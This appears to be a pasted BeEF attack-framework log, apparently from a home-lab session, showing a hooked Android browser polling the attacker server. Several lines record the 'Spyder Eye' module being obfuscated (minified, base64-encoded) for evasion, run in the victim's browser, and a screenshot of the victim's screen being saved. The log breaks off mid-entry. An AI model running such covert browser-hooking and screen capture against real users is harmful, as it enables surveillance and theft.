[23:19:14][>] {"lastseen":"1692573554","count":64,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:15][>] {"lastseen":"1692573555","count":65,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:17][>] {"lastseen":"1692573556","count":66,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:18][>] {"lastseen":"1692573557","count":67,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:19][>] {"lastseen":"1692573558","count":68,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:20][>] {"lastseen":"1692573559","count":69,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:21][>] {"lastseen":"1692573560","count":70,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:22][>] {"lastseen":"1692573561","count":71,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:22][>] Server: mounted handler '/command/spyder_eye.js'
[23:19:22][>] Hard Load module: 'spyder_eye'
[23:19:23][>] {"lastseen":"1692573562","count":72,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:24][>] {"lastseen":"1692573564","count":73,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:25][>] {"lastseen":"1692573565","count":74,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:26][>] {"lastseen":"1692573566","count":75,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:27][>] Server: mounted handler '/h2c.js'
[23:19:27][*] File [/modules/browser/spyder_eye/html2canvas.min.js] bound to Url [/h2c.js] using Content-type [text/javascript]
[23:19:27][>] [Evasion] Applying technique: minify

[23:19:27][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:19:27][>] [Evasion] Applying technique: base_64
[23:19:27][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:19:27][>] [Evasion] Obfuscation completed (1090 bytes)
[23:19:27][>] {"lastseen":"1692573567","count":76,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}

@ChillVibesMushroom
Copy link
Author

[23:19:30][] Browser screenshot saved to '/home/kali/.beef/screenshot__-2023-08-20_23-19-30_2.png'
[23:19:30][>] Event: Browser screenshot saved to '/home/kali/.beef/screenshot
_-_2023-08-20_23-19-30_2.png'
[23:19:30][
] Url [/h2c.js] unmounted
[23:19:30][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:2, mod: 255, name:'Spyder Eye']
[23:19:30][] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:2, mod: 255, name:'Spyder Eye']
[23:19:30][>] {"lastseen":"1692573570","count":77,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:30][>] Event: 78.647s - [Console] log: [2023-08-20 18:19:39] [Spyder Eye] Taking snapshot #0
[23:19:30][>] Event: 78.654s - [Console] log: 1ms
[23:19:30][>] Event: 78.659s - [Console] log: [2023-08-20 18:19:39] [Spyder Eye] Took snapshot successfully
[23:19:30][>] Event: 78.927s - [Console] log: 274ms
[23:19:31][>] {"lastseen":"1692573571","count":78,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:32][>] {"lastseen":"1692573572","count":79,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:33][>] {"lastseen":"1692573573","count":80,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:34][>] {"lastseen":"1692573574","count":81,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:35][>] {"lastseen":"1692573575","count":82,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:36][>] {"lastseen":"1692573576","count":83,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:37][>] {"lastseen":"1692573577","count":84,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:38][>] {"lastseen":"1692573578","count":85,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:39][>] {"lastseen":"1692573579","count":86,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:40][>] {"lastseen":"1692573580","count":87,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:41][>] {"lastseen":"1692573581","count":88,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:42][>] {"lastseen":"1692573582","count":89,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:43][>] {"lastseen":"1692573583","count":90,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:44][>] {"lastseen":"1692573584","count":91,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:45][>] {"lastseen":"1692573585","count":92,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:46][>] {"lastseen":"1692573586","count":93,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:47][>] {"lastseen":"1692573587","count":94,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:48][>] {"lastseen":"1692573588","count":95,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:49][>] {"lastseen":"1692573589","count":96,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:50][>] {"lastseen":"1692573590","count":97,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:51][>] {"lastseen":"1692573591","count":98,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:52][>] {"lastseen":"1692573592","count":99,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
